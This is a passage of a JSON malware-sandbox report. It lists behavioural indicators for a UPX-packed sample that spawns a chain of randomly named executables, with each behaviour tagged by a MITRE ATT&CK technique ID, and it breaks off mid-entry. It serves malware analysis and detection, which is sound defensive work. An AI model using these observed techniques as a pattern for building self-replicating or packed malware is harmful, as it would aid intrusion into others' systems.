\"24e359dc902b844ab74d2135114a140cf3dc741bd872505837361b756f31bc9e.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"tfxnptb.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"tfxnptb.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"628008.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"628008.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"nxhlxrp.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"nxhlxrp.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"jbdtnd.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"jbdtnd.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"rbffv.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"rbffv.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"jfdjvd.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"jfdjvd.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"nrhhv.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"nrhhv.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"tbbdbn.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"tbbdbn.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"ffpfpp.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"ffpfpp.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"00688.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"00688.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"8644820.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"8644820.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"ldnfnvr.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"ldnfnvr.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"jnnjf.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"jnnjf.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"rbppd.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"rbppd.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"6824004.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"6824004.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"dnhpbvd.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"dnhpbvd.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"fxlrjhd.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"fxlrjhd.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"fxxdb.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"fxxdb.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"482088.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"482088.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"lpnpn.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"lpnpn.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"dnjtl.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"dnjtl.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"lvdfpxj.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"lvdfpxj.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"jnbhhn.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"jnbhhn.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"hnndln.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"hnndln.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"8064284.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"8064284.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"02684.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"02684.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"0888688.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"0888688.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"0002220.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"0002220.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"604424.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"604424.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"rhnxdp.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"rhnxdp.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"rhxhth.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"rhxhth.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"66446.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"66446.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"4824668.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"4824668.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"njhpfx.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"njhpfx.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"xrfjx.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"xrfjx.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]", "origin": "API Call", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-10", "type": 10, "name": "Loads the RPC (Remote Procedure Call) module DLL", "description": "\"24e359dc902b844ab74d2135114a140cf3dc741bd872505837361b756f31bc9e.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75EE0000\n \"tfxnptb.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75EE0000\n \"064260.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75EE0000\n \"628008.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75EE0000\n \"nxhlxrp.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75EE0000\n \"jbdtnd.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75EE0000\n \"rbffv.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75EE0000\n \"464446.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75EE0000\n \"04284.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75EE0000\n \"jfdjvd.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75EE0000\n \"nrhhv.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75EE0000\n \"tbbdbn.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75EE0000\n \"xpldnr.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75EE0000\n \"hrbbfnh.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75EE0000\n \"llrlrrb.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75EE0000\n \"vjdhtlv.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75EE0000\n \"ffpfpp.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75EE0000\n \"thdpjd.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75EE0000\n \"00688.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75EE0000\n \"8644820.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75EE0000\n \"2022484.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75EE0000\n \"rvbjvln.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75EE0000\n \"ldnfnvr.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75EE0000\n \"httbh.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75EE0000\n \"jnnjf.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75EE0000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-103", "type": 9, "relevance": 3, "name": "Spawns new processes that are not known child processes", "description": "Spawned process \"tfxnptb.exe\" (UID: 00000000-00005984)\n Spawned process \"064260.exe\" (UID: 00000000-00006008)\n Spawned process \"628008.exe\" (UID: 00000000-00005764)\n Spawned process \"nxhlxrp.exe\" (UID: 00000000-00005776)\n Spawned process \"jbdtnd.exe\" (UID: 00000000-00005756)\n Spawned process \"rbffv.exe\" (UID: 00000000-00005780)\n Spawned process \"464446.exe\" (UID: 00000000-00006096)\n Spawned process \"04284.exe\" (UID: 00000000-00004268)\n Spawned process \"jfdjvd.exe\" (UID: 00000000-00006124)\n Spawned process \"nrhhv.exe\" (UID: 00000000-00006120)\n Spawned process \"tbbdbn.exe\" (UID: 00000000-00006000)\n Spawned process \"xpldnr.exe\" (UID: 00000000-00006028)\n Spawned process \"hrbbfnh.exe\" (UID: 00000000-00004132)\n Spawned process \"llrlrrb.exe\" (UID: 00000000-00004304)\n Spawned process \"vjdhtlv.exe\" (UID: 00000000-00003732)\n Spawned process \"ffpfpp.exe\" (UID: 00000000-00006020)\n Spawned process \"thdpjd.exe\" (UID: 00000000-00004172)\n Spawned process \"00688.exe\" (UID: 00000000-00003708)\n Spawned process \"8644820.exe\" (UID: 00000000-00000772)\n Spawned process \"2022484.exe\" (UID: 00000000-00003872)\n Spawned process \"rvbjvln.exe\" (UID: 00000000-00004368)\n Spawned process \"ldnfnvr.exe\" (UID: 00000000-00001904)\n Spawned process \"httbh.exe\" (UID: 00000000-00001888)\n Spawned process \"jnnjf.exe\" (UID: 00000000-00001896)\n Spawned process \"bnxtdj.exe\" (UID: 00000000-00004324)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-25", "type": 9, "relevance": 3, "name": "Spawns new processes", "description": "Spawned process \"tfxnptb.exe\" (UID: 00000000-00005984)\n Spawned process \"064260.exe\" (UID: 00000000-00006008)\n Spawned process \"628008.exe\" (UID: 00000000-00005764)\n Spawned process \"nxhlxrp.exe\" (UID: 00000000-00005776)\n Spawned process \"jbdtnd.exe\" (UID: 00000000-00005756)\n Spawned process \"rbffv.exe\" (UID: 00000000-00005780)\n Spawned process \"464446.exe\" (UID: 00000000-00006096)\n Spawned process \"04284.exe\" (UID: 00000000-00004268)\n Spawned process \"jfdjvd.exe\" (UID: 00000000-00006124)\n Spawned process \"nrhhv.exe\" (UID: 00000000-00006120)\n Spawned process \"tbbdbn.exe\" (UID: 00000000-00006000)\n Spawned process \"xpldnr.exe\" (UID: 00000000-00006028)\n Spawned process \"hrbbfnh.exe\" (UID: 00000000-00004132)\n Spawned process \"llrlrrb.exe\" (UID: 00000000-00004304)\n Spawned process \"vjdhtlv.exe\" (UID: 00000000-00003732)\n Spawned process \"ffpfpp.exe\" (UID: 00000000-00006020)\n Spawned process \"thdpjd.exe\" (UID: 00000000-00004172)\n Spawned process \"00688.exe\" (UID: 00000000-00003708)\n Spawned process \"8644820.exe\" (UID: 00000000-00000772)\n Spawned process \"2022484.exe\" (UID: 00000000-00003872)\n Spawned process \"rvbjvln.exe\" (UID: 00000000-00004368)\n Spawned process \"ldnfnvr.exe\" (UID: 00000000-00001904)\n Spawned process \"httbh.exe\" (UID: 00000000-00001888)\n Spawned process \"jnnjf.exe\" (UID: 00000000-00001896)\n Spawned process \"bnxtdj.exe\" (UID: 00000000-00004324)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-157", "name": "Matched Compiler/Packer signature (DIE)", "description": "\"24e359dc902b844ab74d2135114a140cf3dc741bd872505837361b756f31bc9e\" was detected as \"UPX\" and name: \"Packer\"\n \"vhxrtdt.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"bdnnt.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"pfdblvl.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"bphhd.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"jvrbx.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"njvhn.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"468866.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"664842.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"840664.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"886680.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"404286.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"62664.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"ftbltx.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"xrfjx.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"jnnxfl.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"bjdlj.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"njhpfx.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"4824668.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"66446.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"00008.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"rhxhth.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"tdtflp.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"nxfnfn.exe\" was detected as \"UPX\" and name: \"Packer\"\n \"rhnxdp.exe\" was detected as \"UPX\" and name: \"Packer\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-176", "type": 6, "relevance": 1, "name": "Calls an API typically used to retrieve function addresses", "description": "details too long to display", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-8", "type": 6, "relevance": 1, "name": "Looks up procedures from modules (excluding apphelp.dll, kernel32.dll, user32.dll, gdi32.dll, ole32.dll, comctl32.dll, uxtheme.dll, oleaut32.dll, version.dll, msctfime.ime)", "description": "\"1300140054f41876@RPCRT4.dll\"\n \"15001600c03e596a@ADVAPI32.dll\"\n \"0e000f00703f596a@ADVAPI32.dll\"\n \"0e000f00cc3f596a@ADVAPI32.dll\"\n \"11001200b447596a@ADVAPI32.dll\"\n \"110012004848596a@ADVAPI32.dll\"\n \"120013008c48596a@ADVAPI32.dll\"\n \"12001300e448596a@ADVAPI32.dll\"\n \"14001500386e596a@ADVAPI32.dll\"\n \"14001500506e596a@ADVAPI32.dll\"\n \"14001500686e596a@ADVAPI32.dll\"\n \"17001800806e596a@ADVAPI32.dll\"\n \"0d000e00986e596a@ADVAPI32.dll\"\n \"11001200a86e596a@ADVAPI32.dll\"\n \"11001200bc6e596a@ADVAPI32.dll\"\n \"0f001000fc6f596a@ADVAPI32.dll\"\n \"140015003c70596a@ADVAPI32.dll\"\n \"140015005470596a@ADVAPI32.dll\"\n \"0c000d009c70596a@ADVAPI32.dll\"\n \"0c000d00ac70596a@ADVAPI32.dll\"\n \"0e000f00bc70596a@ADVAPI32.dll\"\n \"0e000f00cc70596a@ADVAPI32.dll\"\n \"0b000c00dc70596a@ADVAPI32.dll\"\n \"180019001473596a@RPCRT4.dll\"\n \"130014004073596a@RPCRT4.dll\"", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-128", "type": 6, "relevance": 5, "name": "Calls an API typically used to create a process", "description": "\"vjdhtlv.exe\" called \"CreateProcessA\" with parameter \"c:\\ffpfpp.exe\" - (UID: 00000000-00003732)\n \"pdhnj.exe\" called \"CreateProcessA\" with parameter \"c:\\rhnxdp.exe\" - (UID: 00000000-00003636)\n \"bjdlj.exe\" called \"CreateProcessA\" with parameter \"c:\\jnnxfl.exe\" - (UID: 00000000-00003832)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-80", "relevance": 1, "name": "PE file contains executable sections", "description": "\"24e359dc902b844ab74d2135114a140cf3dc741bd872505837361b756f31bc9e\" has an executable section named \"UPX0\"\n \"24e359dc902b844ab74d2135114a140cf3dc741bd872505837361b756f31bc9e\" has an executable section named \"UPX1\"\n \"vhxrtdt.exe\" has an executable section named \"UPX0\"\n \"vhxrtdt.exe\" has an executable section named \"UPX1\"\n \"bdnnt.exe\" has an executable section named \"UPX0\"\n \"bdnnt.exe\" has an executable section named \"UPX1\"\n \"pfdblvl.exe\" has an executable section named \"UPX0\"\n \"pfdblvl.exe\" has an executable section named \"UPX1\"\n \"bphhd.exe\" has an executable section named \"UPX0\"\n \"bphhd.exe\" has an executable section named \"UPX1\"\n \"jvrbx.exe\" has an executable section named \"UPX0\"\n \"jvrbx.exe\" has an executable section named \"UPX1\"\n \"njvhn.exe\" has an executable section named \"UPX0\"\n \"njvhn.exe\" has an executable section named \"UPX1\"\n \"468866.exe\" has an executable section named \"UPX0\"\n \"468866.exe\" has an executable section named \"UPX1\"\n \"664842.exe\" has an executable section named \"UPX0\"\n \"664842.exe\" has an executable section named \"UPX1\"\n \"840664.exe\" has an executable section named \"UPX0\"\n \"840664.exe\" has an executable section named \"UPX1\"\n \"886680.exe\" has an executable section named \"UPX0\"\n \"886680.exe\" has an executable section named \"UPX1\"\n \"404286.exe\" has an executable section named \"UPX0\"\n \"404286.exe\" has an executable section named \"UPX1\"\n \"62664.exe\" has an executable section named \"UPX0\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-95", "name": "PE file contains writable sections", "description": "\"24e359dc902b844ab74d2135114a140cf3dc741bd872505837361b756f31bc9e\" has an writable section named \"UPX0\"\n \"24e359dc902b844ab74d2135114a140cf3dc741bd872505837361b756f31bc9e\" has an writable section named \"UPX1\"\n \"24e359dc902b844ab74d2135114a140cf3dc741bd872505837361b756f31bc9e\" has an writable section named \"UPX2\"\n \"vhxrtdt.exe\" has an writable section named \"UPX0\"\n \"vhxrtdt.exe\" has an writable section named \"UPX1\"\n \"vhxrtdt.exe\" has an writable section named \"UPX2\"\n \"bdnnt.exe\" has an writable section named \"UPX0\"\n \"bdnnt.exe\" has an writable section named \"UPX1\"\n \"bdnnt.exe\" has an writable section named \"UPX2\"\n \"pfdblvl.exe\" has an writable section named \"UPX0\"\n \"pfdblvl.exe\" has an writable section named \"UPX1\"\n \"pfdblvl.exe\" has an writable section named \"UPX2\"\n \"bphhd.exe\" has an writable section named \"UPX0\"\n \"bphhd.exe\" has an writable section named \"UPX1\"\n \"bphhd.exe\" has an writable section named \"UPX2\"\n \"jvrbx.exe\" has an writable section named \"UPX0\"\n \"jvrbx.exe\" has an writable section named \"UPX1\"\n \"jvrbx.exe\" has an writable section named \"UPX2\"\n \"njvhn.exe\" has an writable section named \"UPX0\"\n \"njvhn.exe\" has an writable section named \"UPX1\"\n \"njvhn.exe\" has an writable section named \"UPX2\"\n \"468866.exe\" has an writable section named \"UPX0\"\n \"468866.exe\" has an writable section named \"UPX1\"\n \"468866.exe\" has an writable section named \"UPX2\"\n \"664842.exe\" has an writable section named \"UPX0\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "static-18", "relevance": 10, "name": "Matched Compiler/Packer signature", "description": "\"24e359dc902b844ab74d2135114a140cf3dc741bd872505837361b756f31bc9e\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"vhxrtdt.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"bdnnt.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"pfdblvl.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"bphhd.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"jvrbx.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"njvhn.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"468866.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"664842.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"840664.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"886680.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"404286.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"62664.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"ftbltx.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"xrfjx.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"jnnxfl.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"bjdlj.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"njhpfx.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"4824668.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"66446.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"00008.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"rhxhth.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"tdtflp.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"nxfnfn.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"rhnxdp.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-126", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (executable)", "description": "\"24e359dc902b844ab74d2135114a140cf3dc741bd872505837361b756f31bc9e.exe\" trying to access non-existent file \"C:\\FLTLIB.DLL\"\n \"24e359dc902b844ab74d2135114a140cf3dc741bd872505837361b756f31bc9e.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"24e359dc902b844ab74d2135114a140cf3dc741bd872505837361b756f31bc9e.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"24e359dc902b844ab74d2135114a140cf3dc741bd872505837361b756f31bc9e.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-FIBERS-L1-1-1.DLL\"\n \"24e359dc902b844ab74d2135114a140cf3dc741bd872505837361b756f31bc9e.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-LOCALIZATION-L1-2-1.DLL\"\n \"tfxnptb.exe\" trying to access non-existent file \"c:\\FLTLIB.DLL\"\n \"tfxnptb.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"tfxnptb.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"tfxnptb.exe\" trying to access non-existent file \"C:\\FLTLIB.DLL\"\n \"tfxnptb.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-FIBERS-L1-1-1.DLL\"\n \"tfxnptb.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-LOCALIZATION-L1-2-1.DLL\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-243", "type": 6, "relevance": 1, "name": "Reads files", "description": "\"24e359dc902b844ab74d2135114a140cf3dc741bd872505837361b756f31bc9e.exe\" reads file \"c:\\24e359dc902b844ab74d2135114a140cf3dc741bd872505837361b756f31bc9e.exe\"\n \"24e359dc902b844ab74d2135114a140cf3dc741bd872505837361b756f31bc9e.exe\" reads file \"c:\\tfxnptb.exe\"\n \"tfxnptb.exe\" reads file \"c:\\tfxnptb.exe\"\n \"tfxnptb.exe\" reads file \"c:\\064260.exe\"\n \"064260.exe\" reads file \"c:\\064260.exe\"\n \"064260.exe\" reads file \"c:\\628008.exe\"\n \"628008.exe\" reads file \"c:\\628008.exe\"\n \"628008.exe\" reads file \"c:\\nxhlxrp.exe\"\n \"nxhlxrp.exe\" reads file \"c:\\nxhlxrp.exe\"\n \"nxhlxrp.exe\" reads file \"c:\\jbdtnd.exe\"\n \"jbdtnd.exe\" reads file \"c:\\jbdtnd.exe\"\n \"jbdtnd.exe\" reads file \"c:\\rbffv.exe\"\n \"rbffv.exe\" reads file \"c:\\rbffv.exe\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-177", "type": 3, "relevance": 1, "name": "Opens registry keys", "description": "\"24e359dc902b844ab74d2135114a140cf3dc741bd872505837361b756f31bc9e.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\"; Key: \"\"; Value: \"\")\n \"24e359dc902b844ab74d2135114a140cf3dc741bd872505837361b756f31bc9e.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"\"; Value: \"\")\n \"24e359dc902b844ab74d2135114a140cf3dc741bd872505837361b756f31bc9e.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\DIAGNOSTICS\"; Key: \"\"; Value: \"\")\n \"24e359dc902b844ab74d2135114a140cf3dc741bd872505837361b756f31bc9e.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"\"; Value: \"\")\n \"24e359dc902b844ab74d2135114a140cf3dc741bd872505837361b756f31bc9e.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\\TRACING\"; Key: \"\"; Value: \"\")\n \"24e359dc902b844ab74d2135114a140cf3dc741bd872505837361b756f31bc9e.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLEAUT\"; Key: \"\"; Value: \"\")\n \"24e359dc902b844ab74d2135114a140cf3dc741bd872505837361b756f31bc9e.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\MUICACHED\\MACHINELANGUAGECONFIGURATION\"; Key: \"\"; Value: \"\")\n \"24e359dc902b844ab74d2135114a140cf3dc741bd872505837361b756f31bc9e.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\MUI\\SETTINGS\"; Key: \"\"; Value: \"\")\n 